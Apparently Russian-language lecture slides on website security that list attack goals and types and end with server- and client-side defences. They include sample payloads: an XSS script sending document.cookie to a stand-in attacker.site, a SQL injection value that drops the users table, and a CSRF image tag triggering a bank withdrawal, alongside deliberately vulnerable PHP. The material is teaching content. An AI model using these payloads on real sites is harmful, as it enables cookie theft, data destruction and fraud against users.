Уязвимость сайтов и обеспечение их безопасности Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации Выведение сайтов из строя, удаление данных Замена содержимого сайтов, размещение рекламной информации Предметы атак на сайты WWW-сервера: Операционная система HTTP-сервер Серверные расширения Веб-приложения WWW-клиенты: Операционная система (внедрение вирусов) Получение cookie, хранящихся на компьютере Виды сетевых атак DoS-атаки и DDoS-атаки (Distributed Denial of Service) Фишинг (phishing) ip-спуфинг (spoofing) Троянский конь (Spyware) drive-by download (загрузка программ на сервер) Cross-Site Scripting (CSS) (HTML injection) SQL injection XSS (межсайтовый скриптинг) CSRF (Cross-site request forgery) Атака одного клика Без использования сетевых средств HTML injection <script> window.open("http://www.attacker.site/collec t.cgi?cookie="+document.cookie) </script> SQL injection $firstname = $_POST["firstname"]; mysql_query("SELECT * FROM users WHERE first_name='$firstname'"); Если firstname = "'; drop table users; #", то код удалит таблицу пользователей XSS (межсайтовый скриптинг) $firstname = $_GET["firstname"]; echo "Your name: $firstname"; Если firstname = "<script>…</script>", то скрипт будет выполнен Достаточно дать пользователям ссылку http://hacked.ru/any.php?firstname= <script>…</script> CSRF Атака одного клика Заставить клиента выполнить нужный запрос <img src="http://bank.example/withdraw?account =Bob&amount=1000000&for=John"> Защита от интернет-атак Защита на стороне сервера: Настройка прав на компьютере-сервере Настройка http-сервера Аккуратное программирование на стороне сервера Проверка входящих http-запросов Защита на клиенте: Общая антивирусная защита Проверка входящего http-трафика Настройки безопасности браузеров Разумные методы хранения паролей и конфиденциальных данных